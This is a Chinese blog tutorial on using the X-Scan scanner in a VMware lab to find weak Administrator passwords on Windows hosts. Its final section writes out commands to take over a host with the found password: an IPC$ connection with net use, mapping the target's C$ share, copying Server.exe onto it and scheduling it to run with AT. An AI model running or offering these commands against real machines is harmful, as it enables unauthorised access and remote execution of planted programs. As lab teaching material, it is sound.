x-scanf基本使用教程

x-scanf基本使用教程

2020-04-07 by 梦兮Q

一、实验准备

0.实验原理

• x-scanf已经是很久维护了，最后更新时在2005年，在软件考试界面中作者写的很明白：“理论上可运行于Windows NT系列操作系统，推荐运行于Windows 2000以上的Server版Windows系统。'',但是，我多次实验证明，在win 7系统上扫描时，体验极差，各种扫描不出来和软件崩溃。
• 多次实验后，我个人觉得在win server 2003 体验是最佳的。
• 还有，我在实验中发现，x-scanf只能扫描出管理员账户的弱密码（Administrator）。
• 能扫描出弱密码的原因是，一般的windows系统倒是NT server系统（Windows NT Server），为了通过网络方便远程管理和共享等。而，能有最高权限操作的只有Administrator账户，其他账户的弱密码扫描不到。（可能也是因为没有加入共享组的原因吧，我没具体实验过。）
• 软件下载传送门

链接： https://pan.baidu.com/s/1IwT3...
提取码：9yhz
复制这段内容后打开百度网盘手机App，操作更方便哦

1.实验拓步

本实验中使用的VMware15虚拟机。

• 一台windows server 2003当做扫描的服务器，用于运行x-scanf扫描工具。
• 一台win7和一台win xp 模拟被扫描的主机，开启管理员账户，并设置一个建议的密码：123456，模拟注意设置了不安全的弱密码。
• 将所有虚拟机绑定在同一块虚拟网卡（VMNet10）上，模拟所有主机处于同一局域网。

2.如何将所有虚拟机绑定到同一区域网中？

（1）打开虚拟网络编辑器

（2）创建一个虚拟网络

• VMnet +数字标识，标识了一个虚拟机局域网。
• 选择之后，默认类型是仅主机模式就行了，该模式中你的本地电脑和虚拟机都在同一私有区域网络。

（3）将虚拟机绑定到同一虚拟网络中，这里我给所有虚拟机绑定的是VMnet10。

3.如何开启windows系统管理员账户?

小技巧：

• window server开机后 ，按Ctrl+Alt+Insert 进入系统就不会锁屏了。

（1）右键我的电脑，选择管理。打开计算机管理。

（2）启用管理员账户

（3）打开控制面板，按照下面的路径，找到Administrator账户，并更改密码。

这里我更改的密码为：123456

二、开始扫描系统漏洞

1. 配置扫描参数

打开x-scanf v3.3. GUI.

（1）检测范围

（1）扫描模块

模块功能很丰富，但是本次实验我们主要扫描NT-Server弱口令。

（3）其他设置（重要）

再虚拟环境中，可能会因为某些原因，扫描进程会跳过，所以要选择 无条件扫描

2.开始扫描

• 扫描完成后，会自动弹出html版的扫描报告。

3.提取信息

(1)通过实时扫描结果

（2）通过扫描报告获取详细和统计信息。

查看 》 检查报告

可以点击切换报告的查看类型 HTML、TXT、XML。

HTML：就是网页版本

TXT：记事本文档

XML：可扩展标记语言，将白了，一般是web配置文件的类型。

三、使用扫描到弱密码，操控主机

这里使用net 命令行的方式连接

1. 连接对方

   必需以管理员身份打开，进入CMD/Powershell.

   注意空格

   192.168.100.131：对方IP地址

   123456：为密码

   administrator：用户名

   net use \\\\192.168.100.131\\ipc$ "123456" /user:"administrator"

2. 映射对方的磁盘到我的电脑

   net use Y: \\\\192.168.100.131\\C$  
   //这里时将对方的C盘，映射成我的电脑下的Y盘

3. 向对方复制文件。

   如果可以的话，建议使用资源管理器，把文件复制到Y盘就行了

   copy C:\\Server.exe  \\\\192.168.100.131\\C$  
   //复制我C盘下的‘Server.exe’文件到对方电脑的C盘根目录下

4. 让对方电脑自动执行软件。

   就是给对方电脑发送一些工作指令

   AT \\\\192.168.100.131 22:29 c:\\Server.exe  
   //对方电脑在在22:29运行程序C盘根目录下的Server.exe程序。